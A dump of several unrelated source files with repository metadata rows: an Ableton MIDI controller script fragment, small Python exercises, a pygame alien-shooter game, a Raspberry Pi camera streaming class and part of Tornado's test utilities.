if(match(key, str(self.song().master_track.devices[device].name)) != None):
preset = self.song().master_track.devices[device]
if(preset != None):
self.set_appointed_device(preset)
self.song().view.select_device(preset)
selector._last_preset = selector._mode_index
for button in selector._modes_buttons:
if selector._modes_buttons.index(button) == selector._mode_index:
button.turn_on()
else:
button.turn_off()
return update
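    # Illustrative example (assumptions: `match` is re.match imported at the top of
    # this module, outside this excerpt). With selector._mode_index == 0 the key
    # becomes 'p1 ', so a device named 'p1 Bass' anywhere on the normal, return or
    # master tracks would be appointed and selected as the preset.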
def display_active_client(self):
        if self._device._device is not None:
#self.log_message('selecting....')
self.song().view.select_device(self._device._device)
if ((not self.application().view.is_view_visible('Detail')) or (not self.application().view.is_view_visible('Detail/DeviceChain'))):
self.application().view.show_view('Detail')
self.application().view.show_view('Detail/DeviceChain')
"""these two secondary DeviceComponents are only set up if the MONOHM_LINK flag in .Map is turned on"""
def _setup_alt_device_control(self):
self._device1 = DeviceComponent()
self._device1.name = 'Device_Component1'
self._device2 = DeviceComponent()
self._device2.name = 'Device_Component2'
"""this method is used to find the devices the alt controls will latch to"""
def _find_devices(self):
if self._device1:
if len(self.song().return_tracks) > 0:
if len(self.song().return_tracks[0].devices) > 0:
#self._device.set_device(self.song().return_tracks[0].devices[0])
if self._device1._locked_to_device:
self._device1.set_lock_to_device(False, self._device1._device)
self._device1.set_lock_to_device(True, self.song().return_tracks[0].devices[0])
if self._device2:
if len(self.song().return_tracks) > 1:
if len(self.song().return_tracks[1].devices) > 0:
#self._device2.set_device(self.song().return_tracks[1].devices[0])
if self._device2._locked_to_device:
self._device2.set_lock_to_device(False, self._device2._device)
self._device2.set_lock_to_device(True, self.song().return_tracks[1].devices[0])
#self.log_message('find devices')
"""this secondary MixerComponent is only set up if the MONOHM_LINK flag in .Map is turned on"""
def _setup_alt_mixer(self):
is_momentary = True
        self._num_tracks = 8 #A mixer is one-dimensional
self._mixer2 = MixerComponent(8, 0, False, False)
self._mixer2.name = 'Mixer_2'
self._mixer2.set_track_offset(4) #Sets start point for mixer strip (offset from left)
for index in range(8):
self._mixer2.channel_strip(index).name = 'Mixer_2_ChannelStrip_' + str(index)
self._mixer2.channel_strip(index)._invert_mute_feedback = True
self._mixer3 = MixerComponent(4, 4, False, False)
self._mixer3.name = 'Mixer_3'
self._mixer3.set_track_offset(8) #Sets start point for mixer strip (offset from left)
for index in range(4):
self._mixer3.channel_strip(index).name = 'Mixer_3_ChannelStrip_' + str(index)
self._mixer3.channel_strip(index)._invert_mute_feedback = True
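    # Note on the constructor arguments (an assumption based on the classic
    # _Framework signature MixerComponent(num_tracks, num_returns, with_eqs,
    # with_filters)): _mixer2 is eight plain strips offset to start at the fifth
    # track, while _mixer3 adds four track strips plus four return strips offset
    # to start at the ninth track.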
def _setup_pedal(self):
self._pedal = [None for index in range(8)]
if self._use_pedal is True:
for index in range(7):
self._pedal[index] = LoopPedalButtonElement(MIDI_CC_TYPE, 0, 33+index, Live.MidiMap.MapMode.absolute)
self._pedal[index].name = 'Pedal_'+str(index)
self._pedal[index]._report = False
self._pedal[7] = LoopPedalExpressionElement(self, MIDI_CC_TYPE, 0, 40, Live.MidiMap.MapMode.absolute)
self._pedal[7].name = 'Pedal_'+str(7)
self._pedal[7]._report = False
"""this method is used instead of an unbound method so that another script (MonOhm) can have access to the CNTRLR's methods"""
def _create_monohm_shift(self):
def _monohm_shift(mode):
#self.log_message('block monohm shift ' + str(mode))
self._shifted = mode > 1
self._suppress_next_mod_display = True
self.shift_update()
return _monohm_shift
def _assign_monomodular_controls(self):
#self.log_message('assign mod controls')
if self._monohm != None:
self._monohm._host._set_key_buttons(tuple(self._button[4:12]))
self._monohm._host._set_bank_buttons(tuple(self._button[16:32]))
for index in range(4):
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index+4).set_select_button(self._button[index+12])
def _deassign_monomodular_controls(self):
#self.log_message('deassign mod controls')
if self._monohm != None:
self._monohm._host._set_key_buttons(None)
self._monohm._host._set_bank_buttons(None)
for index in range(8):
self._mixer2.channel_strip(index).set_select_button(None)
def _assign_shifted_controls(self):
if self._monohm != None:
self._monohm._host._set_key_buttons(tuple(self._button[4:12]))
for index in range(4):
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index+4).set_select_button(self._button[index+12])
self._button[index+16].set_on_off_values(MUTE[self._rgb], 0)
self._mixer2.channel_strip(index).set_mute_button(self._button[index+16])
self._button[index+28].set_on_off_values(MUTE[self._rgb], 0)
self._mixer2.channel_strip(index+4).set_mute_button(self._button[index+28])
def tick(self):
self._chopper.get_pos()
def _assign_mod_dials(self):
pass
@subject_slot('value')
def _on_shift_button_value(self, value):
shifted = value > 0
        if self._shifted is not shifted:
self._shifted = shifted
self.deassign_live_controls()
self.assign_live_controls()
if self._shifted and self._on_shift_button_value.subject:
self._on_shift_button_value.subject.send_value(12, True)
# a | [
"[email protected]"
] | |
de99e3d6b96f3f3cf71cfa5b5de8e5d4dcdaecfe | e0677fc5cfa9e1e863feac6552e51c07091301c9 | /build/lib/patata/utilities.py | e822d4f4168c15e1af37d6850a6fd7817c7e6357 | [] | no_license | helendragon/SBI_Project | 084383d50b5b58f5cbdc857d021ab1f9e93c6eed | a1cbffbb635c3ae1543eb09b2a0afaab85297e12 | refs/heads/master | 2020-05-03T17:26:27.419496 | 2019-04-01T02:41:40 | 2019-04-01T02:41:40 | 178,743,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | llista_lletres= ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S",
"T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l"
, "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
llista_lletres2=[]
llista_lletres2= [element+element2 for element in llista_lletres for element2 in llista_lletres]
merged_list= llista_lletres + llista_lletres2
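# A minimal sanity check of the label sequence (an added illustration; runs only
# when the module is executed directly):
if __name__ == "__main__":
    assert merged_list[0] == "A" # the 52 single letters come first
    assert merged_list[52] == "AA" # then every two-letter combination
    assert len(merged_list) == 52 + 52 * 52 # 2756 chain labels in total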
| [
"[email protected]"
] | |
230e5bda7f6cf4d2322d7112137f588603769da0 | d3b55a592310893dd865e867bbe0e40fe1c16991 | /pythonPackagingTest/textinsights_common/textinsights_common.py | e7f857473cc1db2bced5be2c99a625c83828f9ff | [] | no_license | royassis/pythonPackagingTest | a610161d2953948b224fb4749d0be2199eb946a9 | 9e44f8ceec073272de6509a4b2b2a4763dc9c7aa | refs/heads/master | 2023-07-18T22:10:43.424054 | 2021-09-14T20:40:28 | 2021-09-14T20:40:28 | 406,508,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | def some_common_function():
print("im from the textinsights_common.py inside the textinsights_common package") | [
"[email protected]"
] | |
aa40fbd4c1451df0849cac5384e87d8c7d91f01f | 3c88eeb663b109118e734ab6d4a00cf8a8138125 | /become_python_developer/1_programming_foundations_algorithms/5 Searching/issorted_start.py | 759073f96ca38cabc56e10f940cbdcfbc46c6527 | [] | no_license | Gustacro/learning_python | 0dea054751b90cd1df64cb0b9b075fa0bc7a303d | 29562eb625c90b2839a19fd06967c3e9a9f994a3 | refs/heads/master | 2020-12-10T00:55:14.953087 | 2020-01-15T06:50:06 | 2020-01-15T06:50:06 | 233,465,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | # determine if a list is sorted
items1 = [6, 8, 19, 20, 23, 41, 49, 53, 56, 87]
items2 = [6, 20, 8, 19, 56, 23, 87, 41, 49, 53]
def is_sorted(itemlist):
    # brute force: walk the list and compare each adjacent pair
for i in range(0, len(itemlist) - 1):
if itemlist[i] > itemlist[i + 1]:
return False
return True
    # A generator expression with all() does the same as the loop above:
    # all() returns True only if every comparison is true, short-circuiting on the first False
    # return all(itemlist[i] <= itemlist[i + 1] for i in range(0, len(itemlist) - 1))
print(is_sorted(items1))
print(is_sorted(items2))
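# A hedged extension (not part of the original exercise): the same check as a
# standalone function using all() with a generator expression, which
# short-circuits on the first out-of-order pair just like the early return above.
def is_sorted_all(itemlist):
    return all(itemlist[i] <= itemlist[i + 1] for i in range(len(itemlist) - 1))

print(is_sorted_all(items1)) # True
print(is_sorted_all(items2)) # False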
| [
"[email protected]"
] | |
9117c58f9d9af792df47ed740986fa42b7b8c09b | dca45975cb56e3bfad07c28bdfd672db66b3c1c6 | /game.py | 61a5eac726c05186396ed7a8c1971daaf58612b6 | [] | no_license | CristianGrageda/ProyectoSL | 0f72239c7863fea24011b83b372ea601d422028a | 6e38a54c24418f6c1eaaef9ca10aa9a96c45fcdb | refs/heads/master | 2023-01-30T08:24:26.730975 | 2020-12-11T12:22:20 | 2020-12-11T12:22:20 | 305,205,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,818 | py | import pygame
from menu import *
from metodos_clases import *
from camara import *
class Game():
def __init__(self):
pygame.init()
        # -- GAME RUNNING, START PLAYING, GAME ALREADY INITIALIZED (to handle pausing) --
self.ejecucion, self.jugar, self.inicio = True, False, False
self.nivel = 1
        # -- VARIABLES FOR INTERACTING WITH THE MENU --
self.TECLA_ARRIBA, self.TECLA_ABAJO, self.TECLA_ENTER, self.TECLA_ATRAS = False, False, False, False
self.ANCHO, self.ALTO = 800, 600
        # -- SURFACE THE GAME IS DRAWN ON AND THE WINDOW FOR THE FINAL PROJECTION --
self.ventana_atras = pygame.Surface((self.ANCHO, self.ALTO))
self.ventana = pygame.display.set_mode(((self.ANCHO, self.ALTO)))
        # -- FONTS --
self.fuente_1 = 'fuentes/Super Retro M54.ttf'
self.fuente_2 = 'fuentes/Target Shooting.otf'
self.fuente_3 = 'fuentes/lcddot_tr.ttf'
        # -- MENU SOUNDS AND IMAGES --
self.sonido_cursor = pygame.mixer.Sound("sonidos/cursor_menu.wav")
self.sonido_seleccion = pygame.mixer.Sound("sonidos/seleccion_menu.wav")
self.sonido_deseleccion = pygame.mixer.Sound("sonidos/deseleccion_menu.wav")
self.fondo_controles = pygame.image.load("multimedia/controles.png").convert()
self.fondo_menu = pygame.image.load("multimedia/menu_principal.png").convert()
self.fondo_creditos = pygame.image.load("multimedia/creditos.png").convert()
self.vida_jugador = pygame.image.load("multimedia/vida_soldado.png").convert_alpha()
        # -- COLORS AND WINDOW MIDPOINTS --
self.NEGRO, self.BLANCO, self.VERDE, self.AMARILLO, self.ROJO = (0, 0, 0), (255, 255, 255), (0, 125, 15), (213, 213, 0), (185, 0, 0)
self.MITAD_ANCHO = self.ANCHO/2
self.MITAD_ALTO = self.ALTO/2
        # -- MENU CREATION --
self.menu_principal = MenuPrincipal(self)
self.menu_niveles = MenuNivel(self)
self.menu_controles = MenuControles(self)
self.menu_creditos = MenuCreditos(self)
self.menu_datos = MenuDatos(self)
        # -- SETS THE MENU STATE SO WE KNOW WHICH MENU WE ARE IN --
self.estado_menu = self.menu_principal
self.seleccion = "Nada" # Selecciona opcion de "Menu de datos"
self.reloj = pygame.time.Clock() # Crea Reloj
self.muro = pygame.image.load("multimedia/muro.png").convert()
        # --- LOAD MAP IMAGES ---
self.muro_roto = pygame.image.load("multimedia/muro_roto.png").convert()
self.item = pygame.image.load("multimedia/item.png").convert_alpha()
self.pozo = pygame.image.load("multimedia/pozo.png").convert_alpha()
self.botiquin = pygame.image.load("multimedia/botiquin.png").convert_alpha()
self.mancha = pygame.image.load("multimedia/mancha.png").convert_alpha()
self.misil_icono = pygame.image.load("multimedia/misil_icono.png").convert_alpha()
def nivel_uno(self):
        # --- MAP ---
self.crear_mapa = [
"MMMMMMMMMNMMMMMMMMMMMMMMMMMNMMMM",
"M MI M",
"MR R R M R RM",
"M M R M R M",
"MI RM MNMM M",
"MMMMMM M M",
"M M M",
"MR MMMMMMR I M",
"MI MR MMMMMMMMM N",
"M RMI B IM M",
"MR M M M",
"NMMMMMMMMMMMMR MR RM R M",
"M I BN M M M",
"MR R M M M M",
"M M M M R M M",
"M MR M M M M",
"MIRM M M M M",
"MMMM R M MR RM M",
"M M M M M",
"MI RM M MR M",
"MR M M R N M",
"M M R M",
"MB M R IM",
"MMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMM"
]
        # --- CREATION OF REQUIRED DATA ---
        self.player = Player(self.MITAD_ANCHO, self.MITAD_ALTO, self.nivel) # Creates the player
        self.camara = Camara(self.player) # Creates the camera and its movements
self.camara_seguir = Seguir(self.camara,self.player)
self.camara_limitada = Limite(self.camara,self.player)
self.camara.cambiar_modo(self.camara_seguir)
        self.fondo = Fondo(self.camara, self.camara_seguir, self.camara_limitada, self.nivel) # Creates the background
        # --- BUILD THE MAP ---
        self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
        # --- ADD THE REQUIRED SPRITES ---
self.all_sprites = pygame.sprite.Group()
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
def nivel_dos(self):
self.nivel_uno()
        # --- MAP ---
self.crear_mapa = [
"MMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMNMMMMM",
"MI M IM M",
"M R R M R MR RN",
"M MMS M R M M",
"MB M RMB M M",
"M MMS RM M",
"M R M N N",
"NMMMMMMMMMM MMMMMMMMMMMMMMMMMM MR M",
"M M M M",
"MR R MMS R M R M",
"M M RM M",
"MB I MMS M M",
"MMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMB RM",
"M M",
"M R S R I S R M",
"M MMMMMMMMMMMNMMMMMMMMMMMMMNMMMMMMMMMN",
"M BM IM",
"N R R M R R B RM",
"M S R M MMMMMMMMMMMMMM",
"M RIM M",
"M MMMMMNMMMMMMMMMMMMMMSR RM",
"M IM",
"MR S R R S M",
"NMMMMMMNMMMMMMMM NMMMMMMMMMMMM MMMN",
"MB M M M",
"MI R M MR RM",
"MR M RR M R M",
"M NMS S N",
"MR MMMMMMMM MMMMMMM",
"M M M R R M",
"MIS R MM BMS I B M",
"MMMMMMMMNMMMMMMNMMMMMMMMMMMMMMMMMMNMMMMN"
]
        # --- BUILD THE MAP ---
        self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
        # --- ADD THE REQUIRED SPRITES ---
self.all_sprites = pygame.sprite.Group()
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
def nivel_final(self):
self.crear_mapa = [
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
" M M ",
"B M MC "
]
        self.fondo = Fondo(0, 0, 0, self.nivel) # Creates the background
        self.player = Player(self.MITAD_ANCHO, 550, self.nivel) # Creates the player
self.boss = Boss(300, 0)
self.mapa = construir_mapa(self.crear_mapa, self.muro, self.muro_roto, self.item, self.pozo, self.botiquin, self.mancha, self.misil_icono, self.player)
self.all_sprites = pygame.sprite.Group()
self.all_sprites.add(self.boss)
self.aliens = []
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
self.aliens.append(self.boss)
def bucle_juego(self):
pygame.mixer.music.stop()
pygame.mixer.music.load("sonidos/fondo1.mp3")
        # -- WHEN STARTING TO PLAY, THE GAME IS FLAGGED AS "INITIALIZED" --
if self.jugar:
self.inicio = True
pygame.mixer.music.play()
else:
pygame.mixer.music.stop()
while self.jugar:
if self.nivel == 1 or self.nivel == 2:
teclado = pygame.key.get_pressed()
for event in pygame.event.get():
                    # -- CLOSE THE GAME WHEN THE WINDOW IS CLOSED --
if event.type == pygame.QUIT:
pygame.quit()
                    # -- GO BACK TO THE MENU WHEN ESC IS PRESSED --
if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
self.jugar = False
self.estado_menu = self.menu_principal
pygame.mixer.music.stop()
                    # -- PLAYER MOVEMENT EVENTS (IDLE PLAYER, SHOOTING) --
if event.type == pygame.KEYDOWN:
if (event.key == pygame.K_SPACE or event.key == pygame.K_RETURN) and self.player.pulsado:
self.player.sonido_disparo.stop()
if self.player.posicion == 0:
self.player.disparar(self.all_sprites, self.player.rect.centerx-15, self.player.rect.centery, 0)
elif self.player.posicion == 1:
self.player.disparar(self.all_sprites, self.player.rect.centerx+10, self.player.rect.centery, 0)
elif self.player.posicion == 2:
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery+10, 0)
elif self.player.posicion == 3:
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery+10, 0)
self.player.sonido_disparo.play()
self.player.pulsado = False
if event.type == pygame.KEYUP:
if (event.key == pygame.K_LEFT or event.key == pygame.K_a) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_izquierda')
self.player.posicion = 3
elif (event.key == pygame.K_RIGHT or event.key == pygame.K_d) and (teclado[pygame.K_LEFT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_derecha')
self.player.posicion = 2
elif (event.key == pygame.K_UP or event.key == pygame.K_w) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_LEFT] == False and teclado[pygame.K_DOWN] == False):
self.player.animacion('quieto_arriba')
self.player.posicion = 1
elif (event.key == pygame.K_DOWN or event.key == pygame.K_s) and (teclado[pygame.K_RIGHT] == False and teclado[pygame.K_UP] == False and teclado[pygame.K_LEFT] == False):
self.player.animacion('quieto_abajo')
self.player.posicion = 0
if event.key == pygame.K_SPACE or event.key == pygame.K_RETURN:
self.player.pulsado = True
                    # -- Switch the camera mode
self.fondo.modo_de_camara(event)
                # --- Player events and camera movement ---
self.player.update(self.mapa, self.all_sprites, self.camara, self.aliens)
self.camara.scroll()
                # --- MORE AIRBORNE ALIENS SPAWN AS ITEMS ARE COLLECTED (when 6, 3 and 2 items remain) ---
if (self.player.items == 6 or self.player.items == 3 or self.player.items == 2) and self.player.mas_respawn:
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
self.player.mas_respawn = False
                # --- Draw everything to the window ---
self.fondo.update(self.ventana_atras, self.camara.offset.x, self.camara.offset.y)
pintar_mapa(self.ventana_atras, self.mapa, self.camara.offset.x, self.camara.offset.y)
self.all_sprites.update(self.mapa, self.camara.offset.x, self.camara.offset.y, self.ventana_atras, self.aliens, self.player, self.all_sprites)
self.ventana_atras.blit(self.player.image, (self.player.rect.x - self.camara.offset.x, self.player.rect.y - self.camara.offset.y))
pintar_vida(self.ventana_atras, 0, 531, self.player.vida, self.player.vida_total, self.BLANCO, self.VERDE, self.vida_jugador)
self.pintar_record("A L I E N S : ", 25, 650, 553, self.player.alien_muertos)
self.pintar_record("I T E M S : ", 25, 650, 569, self.player.items)
self.ventana.blit(self.ventana_atras, (0,0))
                # --- IF THE PLAYER COLLECTS EVERY ITEM AND KILLS EVERY ALIEN, THEY WIN ---
if self.player.items == 0 and self.player.alien_muertos == 0:
self.inicio = False
self.jugar = False
self.seleccion = "Logro"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
elif self.nivel == 3:
teclado = pygame.key.get_pressed()
for event in pygame.event.get():
                    # -- CLOSE THE GAME WHEN THE WINDOW IS CLOSED --
if event.type == pygame.QUIT:
pygame.quit()
                    # -- GO BACK TO THE MENU WHEN ESC IS PRESSED --
if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
self.jugar = False
self.estado_menu = self.menu_principal
pygame.mixer.music.stop()
                    # -- PLAYER MOVEMENT EVENTS (IDLE PLAYER, SHOOTING) --
if event.type == pygame.KEYDOWN:
if (event.key == pygame.K_SPACE or event.key == pygame.K_RETURN) and self.player.pulsado:
self.player.sonido_disparo.stop()
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery, 0)
self.player.sonido_disparo.play()
self.player.pulsado = False
if event.type == pygame.KEYUP:
if (event.key == pygame.K_LEFT or event.key == pygame.K_a) and (teclado[pygame.K_RIGHT] == False):
self.player.animacion('quieto_izquierda')
self.player.posicion = 3
elif (event.key == pygame.K_RIGHT or event.key == pygame.K_d) and (teclado[pygame.K_LEFT] == False):
self.player.animacion('quieto_derecha')
self.player.posicion = 2
if event.key == pygame.K_SPACE or event.key == pygame.K_RETURN:
self.player.pulsado = True
if event.key == pygame.K_e:
if self.player.botiquin_disponible > 0:
if self.player.vida < self.player.vida_total:
self.player.vida += 10
self.player.botiquin_disponible -= 1
self.player.sonido_vida.play()
if self.player.vida > self.player.vida_total:
self.player.vida = self.player.vida_total
if event.key == pygame.K_q:
if self.player.misil_disponible > 0:
self.player.sonido_misil.stop()
self.player.disparar(self.all_sprites, self.player.rect.centerx, self.player.rect.centery, 1)
self.player.sonido_misil.play()
self.player.misil_disponible -= 1
                # --- Player events (no camera scroll on this level) ---
self.player.update(self.mapa, self.all_sprites, 0, self.aliens)
                # --- WHEN THE CURRENT SPIDER WAVE IS WIPED OUT, SPAWN THE NEXT ONE ---
if self.player.oleada_aranias == 0:
self.aliens = crear_aliens(self.all_sprites, self.crear_mapa, self.aliens, self.player.mas_respawn, self.nivel, self.player)
                # --- Draw everything to the window ---
self.fondo.update(self.ventana_atras, 0, 0)
pintar_mapa(self.ventana_atras, self.mapa, 0, 0)
self.all_sprites.update(self.mapa, 0, 0, self.ventana_atras, self.aliens, self.player, self.all_sprites)
self.ventana_atras.blit(self.player.image, (self.player.rect.x, self.player.rect.y))
pintar_vida_final(self.ventana_atras, 25, 441, self.player.vida, self.player.vida_total, self.VERDE, self.AMARILLO, self.ROJO)
pintar_vida_final(self.ventana_atras, 725, 441, self.boss.vida, self.boss.vida_total, self.VERDE, self.AMARILLO, self.ROJO)
self.pintar_record("x ", 45, 75, 575, self.player.botiquin_disponible)
self.pintar_record("x ", 45, 775, 575, self.player.misil_disponible)
self.ventana.blit(self.ventana_atras, (0,0))
# --- SI EL JUGADOR RECOGE TODOS LOS ITEMS Y MATA A TODOS, GANA ---
if self.boss.vida <= 0:
self.boss.sonido_muerte.play()
self.inicio = False
self.jugar = False
self.seleccion = "Logro"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
# --- SI EL JUGADOR SE QUEDA SIN VIDA, MUESTRA MENSAJE DE DERROTA ---
if self.player.vida <= 0:
self.inicio = False
self.jugar = False
self.seleccion = "Derrota"
self.estado_menu = self.menu_datos
pygame.mixer.music.stop()
            # --- Update the display ---
pygame.display.flip()
# --- FPS ---
self.reloj.tick(50)
self.resetear_teclas()
    # ---- HANDLES THE OPTIONS SELECTED IN THE MENUS ----
def chequear_eventos(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.ejecucion, self.jugar = False, False
self.estado_menu.run_display = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
self.sonido_seleccion.play()
self.TECLA_ENTER = True
if event.key == pygame.K_BACKSPACE:
self.sonido_deseleccion.play()
self.TECLA_ATRAS = True
if event.key == pygame.K_DOWN:
self.sonido_cursor.play()
self.TECLA_ABAJO = True
if event.key == pygame.K_UP:
self.sonido_cursor.play()
self.TECLA_ARRIBA = True
    # ---- RESETS THE MENU KEYS ----
def resetear_teclas(self):
self.TECLA_ARRIBA, self.TECLA_ABAJO, self.TECLA_ENTER, self.TECLA_ATRAS = False, False, False, False
    # ---- DRAWS THE MENU TEXT ----
def pintar_texto(self, texto, tamanio, x, y ):
fuente = pygame.font.Font(self.fuente_1, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
# ---- PINTA EL "CURSOR" PARA SELECCIONAR OPCIONES EN EL MENU ----
def pintar_cursor(self, texto, tamanio, x, y ):
fuente = pygame.font.Font(self.fuente_2, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
    # ---- DRAWS THE POINTS STILL NEEDED FOR THE NEXT LEVEL ----
def pintar_record(self, texto, tamanio, x, y, puntos):
texto = texto + str(puntos)
fuente = pygame.font.Font(self.fuente_3, tamanio)
texto_superficie = fuente.render(texto, True, self.BLANCO)
texto_rect = texto_superficie.get_rect()
texto_rect.center = (x,y)
self.ventana_atras.blit(texto_superficie,texto_rect)
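# A hedged entry-point sketch (assumptions: the Menu classes imported from menu.py
# expose a display_menu() loop that calls chequear_eventos()/resetear_teclas() and
# flips estado_menu/jugar; this mirrors the usual shape of such scripts and is not
# part of the original file):
#   if __name__ == "__main__":
#       g = Game()
#       while g.ejecucion:
#           g.estado_menu.display_menu()
#           g.bucle_juego()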
| [
"[email protected]"
] | |
236ed30e3874b7479cd53c90e99ac5529579ce13 | 53c0df3772d2cf69f52d715d7a897b9d79e84a75 | /camera.py | a01229adb72b6a7fa16f6adc1ea19a56596c381a | [] | no_license | jmajurel/spyCam | 00723eb7a6fece84c867b1c363054aa819bedf38 | b0a8a84e21bbd02023b72deeb9650b714968278f | refs/heads/master | 2023-03-07T21:55:11.369965 | 2021-02-17T16:23:16 | 2021-02-17T16:23:16 | 338,104,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | from io import BytesIO
from time import sleep
from picamera import PiCamera
from image_analyser import ImageAnalyser
import cv2
class Camera:
def __init__(self, width = 1024, height = 768):
self.__camera = PiCamera()
self.__camera.resolution = (width, height)
self.stream = BytesIO()
self.__delay = 2
self.__image_analyser = ImageAnalyser()
def warm_up(self):
self.__camera.start_preview()
sleep(self.__delay)
def take_picture(self, name='image.jpeg'):
self.warm_up()
self.__camera.capture(name)
    def take_continuous(self):
        # reuse one in-memory stream: each captured JPEG frame overwrites the last
        for _ in self.__camera.capture_continuous(self.stream, 'jpeg', use_video_port=True):
            # run person detection and get back the (possibly annotated) stream
            self.stream = self.__image_analyser.identify_people(self.stream)
            self.stream.seek(0)
            image_as_bytes = self.stream.read()
            # rewind and truncate so the next capture starts from a clean buffer
            self.stream.seek(0)
            self.stream.truncate()
            # emit one part of a multipart/x-mixed-replace (MJPEG) stream
            yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + image_as_bytes + b'\r\n\r\n')
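# A hedged usage sketch (assumptions: Flask is installed and this runs on a
# Raspberry Pi where picamera is available). take_continuous() yields
# multipart/x-mixed-replace parts with boundary "frame", which is the shape a
# streaming Flask Response expects:
#
#   from flask import Flask, Response
#   app = Flask(__name__)
#   cam = Camera()
#
#   @app.route("/video")
#   def video():
#       return Response(cam.take_continuous(),
#                       mimetype="multipart/x-mixed-replace; boundary=frame")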
| [
"[email protected]"
] | |
9cefaaea70f554b97014656f629c999bf36330c8 | ff0c17789badd75559eb834fe039d4b4ab175ba8 | /pythonscript/x11-64-cpython/lib/python3.6/site-packages/tornado/test/util.py | 63a9762f14affb81d80e41f4f7f60d079bbe6a34 | [
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unicode",
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"OpenSSL",
"MIT"
] | permissive | studioschade/notebook_graph | 3f7555ab46167b050e461164c6b4a1525dc7df0c | 0fd159855fdd9c38a6dd293e5ec6164986ad6209 | refs/heads/master | 2022-10-23T23:54:54.467050 | 2018-10-14T08:10:18 | 2018-10-14T08:10:18 | 148,099,361 | 9 | 2 | MIT | 2022-10-10T20:16:48 | 2018-09-10T04:32:44 | Python | UTF-8 | Python | false | false | 4,006 | py | from __future__ import absolute_import, division, print_function
import contextlib
import os
import platform
import socket
import sys
import textwrap
from tornado.testing import bind_unused_port
# Delegate the choice of unittest or unittest2 to tornado.testing.
from tornado.testing import unittest
skipIfNonUnix = unittest.skipIf(os.name != 'posix' or sys.platform == 'cygwin',
"non-unix platform")
# travis-ci.org runs our tests in an overworked virtual machine, which makes
# timing-related tests unreliable.
skipOnTravis = unittest.skipIf('TRAVIS' in os.environ,
'timing tests unreliable on travis')
skipOnAppEngine = unittest.skipIf('APPENGINE_RUNTIME' in os.environ,
'not available on Google App Engine')
# Set the environment variable NO_NETWORK=1 to disable any tests that
# depend on an external network.
skipIfNoNetwork = unittest.skipIf('NO_NETWORK' in os.environ,
'network access disabled')
skipBefore33 = unittest.skipIf(sys.version_info < (3, 3), 'PEP 380 (yield from) not available')
skipBefore35 = unittest.skipIf(sys.version_info < (3, 5), 'PEP 492 (async/await) not available')
skipNotCPython = unittest.skipIf(platform.python_implementation() != 'CPython',
'Not CPython implementation')
# Used for tests affected by
# https://bitbucket.org/pypy/pypy/issues/2616/incomplete-error-handling-in
# TODO: remove this after pypy3 5.8 is obsolete.
skipPypy3V58 = unittest.skipIf(platform.python_implementation() == 'PyPy' and
sys.version_info > (3,) and
sys.pypy_version_info < (5, 9),
'pypy3 5.8 has buggy ssl module')
def _detect_ipv6():
if not socket.has_ipv6:
# socket.has_ipv6 check reports whether ipv6 was present at compile
# time. It's usually true even when ipv6 doesn't work for other reasons.
return False
sock = None
try:
sock = socket.socket(socket.AF_INET6)
sock.bind(('::1', 0))
except socket.error:
return False
finally:
